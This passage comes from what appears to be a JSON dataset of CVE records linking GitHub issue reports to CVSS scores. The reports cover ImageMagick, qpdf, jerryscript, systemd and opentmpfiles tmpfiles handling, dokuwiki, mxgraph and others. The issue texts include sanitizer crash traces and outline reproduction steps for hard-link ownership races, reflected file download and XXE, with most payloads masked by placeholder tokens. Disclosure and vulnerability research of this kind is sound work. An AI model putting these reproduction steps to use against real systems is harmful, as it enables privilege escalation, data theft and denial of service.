        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/904",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/904",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-20T06:01:03Z",
        "description": "memory leaks. system\uff1aubuntu NUMBERTAG ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc /dev/null montage: no decode delegate for this image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18027",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/734",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/734",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-06T14:58:42Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18028",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/736",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/736",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-07T06:44:11Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When convert tiff file , imagemagick will allocate memory to store the data, here is the critical code: (tiff.c , in function APITAG APITAG The \"rows\" can be got from tiff file,that is to say it can be controlled by input APITAG is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18029",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/691",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/691",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-22T16:03:42Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18048",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/426",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/426",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2017-11-20T11:51:56Z",
        "description": "Patch for Remote Command Execution Vulnerability. Hi MENTIONTAG Kindly blacklist extensions all uppercase or a combination of uppercase and lowercase APITAG also in FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18077",
        "Issue_Url_old": "https://github.com/juliangruber/brace-expansion/issues/33",
        "Issue_Url_new": "https://github.com/juliangruber/brace-expansion/issues/33",
        "Repo_new": "juliangruber/brace-expansion",
        "Issue_Created_At": "2017-03-02T06:35:17Z",
        "description": "APITAG in expand. APITAG will cause a APITAG accept URLTAG will fix the security bug.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18078",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/7736",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/7736",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2017-12-24T17:33:43Z",
        "description": "tmpfiles: unsafe handling of hard links and a race condition. These issues only affect a vanilla kernel, so for any of this to make sense on a patched distro kernel, you'll want to disable the following: APITAG The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: APITAG The first time that tmpfiles is run, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and re run tmpfiles... APITAG to take ownership of APITAG : APITAG Now, I said that everything was fine the first time that tmpfiles was run, but I lied. The recursive chown moves from the top down, meaning that APITAG is chowned after APITAG . There is a race condition there that can be exploited. In another terminal, you can run, APITAG and if you're lucky, the hard link will get created after you own the APITAG directory, but before chown is called on x . This particular race condition isn't unique to the Z type. For another example, consider, APITAG Here, the same thing happens, and the \"mjo\" user has some time to replace foo with a hard link.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18120",
        "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/117",
        "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/117",
        "Repo_new": "kohler/gifsicle",
        "Issue_Created_At": "2017-10-16T13:21:05Z",
        "description": "denial of service attack. Hi, I received two report bugs that may allow a denial of service attack. Maybe one has already been fixed NUMBERTAG CVETAG But this one is new I guess. CVETAG Regards, Herbert",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18123",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2029",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2029",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2017-06-27T12:49:21Z",
        "description": "reflected file download vulnerability. originally reported in URLTAG Description The APITAG parameter on APITAG does not properly encode user input, which leads to the reflected file download vulnerability. Example: APITAG The server responds with: ERRORTAG . Impact This can lead to arbitrary code execution on a victim's machine! Reproduction on Windows NUMBERTAG Open Chrome Browser NUMBERTAG isit redacted contained a link with a download attribute NUMBERTAG Right click the Download link and click Save Link As and then save NUMBERTAG APITAG should then download, which contains the attacker's shellcode, downloaded from APITAG If the user runs this batch file in Windows, it will open your calculator! This could lead to the entire compromise of the victim's computer. Patch I recommend URL encoding any characters in the server response (if the ajax call is not found) such as APITAG and APITAG and APITAG References URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 6.0,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18183",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/143",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/143",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-08-12T07:51:55Z",
        "description": "stack overflow / crash on malformed input in APITAG The attached file will crash qpdf. It seems it's running into an endless recursion and thus a stack overflow. Found with afl. FILETAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG ffda4d NUMBERTAG c0 sp NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG T NUMBERTAG ba NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG int) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18184",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/147",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/147",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-08-23T09:37:44Z",
        "description": "stack out of bounds read in function iterate_rc4. The attached file will cause an out of bounds read in qpdf, detectable with address sanitizer. FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffee NUMBERTAG f NUMBERTAG at pc NUMBERTAG ee NUMBERTAG bp NUMBERTAG ffee NUMBERTAG f NUMBERTAG sp NUMBERTAG ffee NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffee NUMBERTAG f NUMBERTAG thread T NUMBERTAG ee NUMBERTAG in iterate_rc4(unsigned char , int, unsigned char , int, int, bool) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e6c in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffee NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG cf in APITAG PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG <== Memory access at offset NUMBERTAG overflows this variable NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG id NUMBERTAG id_obj NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG encryption_dict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG [ ERRORTAG NUMBERTAG APITAG NUMBERTAG O NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG U NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG OE NUMBERTAG UE NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG CF NUMBERTAG APITAG NUMBERTAG keys NUMBERTAG cdict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG method_name NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG EFF NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG data NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG perms_valid NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18185",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/150",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/150",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-08-27T15:25:54Z",
        "description": "heap out of bounds read (large) in APITAG The attached file causes an out of bounds heap read, detectable with asan, found with libfuzzer. FILETAG ASAN error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG bcf NUMBERTAG bp NUMBERTAG ffe NUMBERTAG cea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ce1e0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG bcf NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c4 in APITAG char , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ddf in APITAG PATHTAG NUMBERTAG ddf in APITAG char , unsigned long) PATHTAG NUMBERTAG in APITAG char , int, int) PATHTAG NUMBERTAG e6c in APITAG char , unsigned long) PATHTAG NUMBERTAG e NUMBERTAG b0 in APITAG int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , int, int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , unsigned long, qpdf_stream_decode_level_e, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG ed6 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG long, APITAG PATHTAG NUMBERTAG c in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG in QPDF::read_xref(long long) PATHTAG NUMBERTAG e3f in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f8d7e6e NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in operator APITAG long) ( PATHTAG NUMBERTAG e3 in APITAG const , Pipeline , APITAG unsigned int, unsigned int) PATHTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18186",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/149",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/149",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-08-24T09:59:52Z",
        "description": "xref loop causes qpdf to hang. The attached file will cause an infinite loop in qpdf due to looping xref's. FILETAG This is actually an example from a six year old bug in evince, discovered by andreas bogk, see: CVETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18188",
        "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/3",
        "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/3",
        "Repo_new": "openrc/opentmpfiles",
        "Issue_Created_At": "2017-12-24T14:52:54Z",
        "description": "Unsafe use of recursive chown in \"Z\" support. The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: CODETAG The first time that opentmpfiles setup is launched, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and restart opentmpfiles setup... ERRORTAG and now I own APITAG ! APITAG This happens, ultimately, because APITAG will \"follow\" a hard link. This same problem was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18197",
        "Issue_Url_old": "https://github.com/jgraph/mxgraph/issues/124",
        "Issue_Url_new": "https://github.com/jgraph/mxgraph/issues/124",
        "Repo_new": "jgraph/mxgraph",
        "Issue_Created_At": "2017-11-22T04:31:44Z",
        "description": "APITAG vulnerable to XXE attack. APITAG instance in APITAG is missing flags to prevent external entity and doctype declaration, making it vulnerable to XXE attacks. At minimum set the flags used in APITAG example. Setting \" URLTAG \" to false would additionally prevent loading of external DTD. Below are steps to reproduce. It'll need external DTD to actually extract anything but from the stack trace is sufficient to show the class is vulnerable to XXE NUMBERTAG Set up and run the Java example NUMBERTAG POST to APITAG with the following payload xml= APITAG APITAG APITAG ]> APITAG APITAG APITAG NUMBERTAG e NUMBERTAG b APITAG APITAG APITAG NUMBERTAG e; APITAG APITAG NUMBERTAG Make a GET request to URLTAG NUMBERTAG erify it's trying to read an non existent \"/blah\" file",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18209",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/790",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/790",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:04:44Z",
        "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG APITAG APITAG may return NULL, so the following operations on the \"temp\" will dereference null pointer to cause memory error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18210",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/791",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/791",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:06:03Z",
        "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18211",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/792",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/792",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:07:14Z",
        "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG ERRORTAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18212",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2140",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2140",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2017-12-07T06:24:06Z",
        "description": "heap buffer overflow in lit_read_code_unit_from_hex. the following poc can trigger a heap buffer overflow bugs. ========================== APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b6 bp NUMBERTAG bfb5e7f8 sp NUMBERTAG bfb5e7e8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d thread T NUMBERTAG b5 in lit_read_code_unit_from_hex PATHTAG NUMBERTAG c2 in re_parse_char_class PATHTAG NUMBERTAG bd NUMBERTAG in re_parse_alternative PATHTAG NUMBERTAG d NUMBERTAG in re_compile_bytecode PATHTAG NUMBERTAG af7 in ecma_op_create_regexp_object PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG ae0dd in ecma_builtin_dispatch_call PATHTAG NUMBERTAG fbd5e in ecma_op_function_call PATHTAG NUMBERTAG a NUMBERTAG c6 in opfunc_call PATHTAG NUMBERTAG a NUMBERTAG c6 in vm_execute PATHTAG NUMBERTAG a9dd5 in vm_run PATHTAG NUMBERTAG a9dd5 in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fc9d ( PATHTAG NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG d) allocated by thread T0 here NUMBERTAG b NUMBERTAG f6dee in malloc ( PATHTAG NUMBERTAG f4c4 in APITAG PATHTAG NUMBERTAG f4c4 in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f4c4 in jmem_heap_alloc_block PATHTAG NUMBERTAG ab0b in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ccbb in parser_compute_indicies PATHTAG NUMBERTAG ccbb in parser_post_processing PATHTAG NUMBERTAG in parser_parse_source PATHTAG NUMBERTAG b NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG b1 in jerry_parse PATHTAG NUMBERTAG b1 in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG d in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa NUMBERTAG b NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG b NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the platform is ubuntu NUMBERTAG and the build options are: python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common jerry libc=off static link=off lto=off error message=on system allocator=on",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18214",
        "Issue_Url_old": "https://github.com/moment/moment/issues/4163",
        "Issue_Url_new": "https://github.com/moment/moment/issues/4163",
        "Repo_new": "moment/moment",
        "Issue_Created_At": "2017-09-08T09:34:22Z",
        "description": "Vulnerable Regular Expression. The following regular expression used to parse dates specified as strings is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18239",
        "Issue_Url_old": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
        "Issue_Url_new": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
        "Repo_new": "jasongoodwin/authentikat-jwt",
        "Issue_Created_At": "2015-03-23T18:30:21Z",
        "description": "add option to do full comparison to prevent time based guessing of the private key. Tim APITAG flagged that users may be able to guess how correct their guesses are by measuring time of response. Seems this might be difficult to actually exploit but we can add some non blocking delays or otherwise do a full comparison.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18248",
        "Issue_Url_old": "https://github.com/apple/cups/issues/5143",
        "Issue_Url_new": "https://github.com/apple/cups/issues/5143",
        "Repo_new": "apple/cups",
        "Issue_Created_At": "2017-10-16T11:19:04Z",
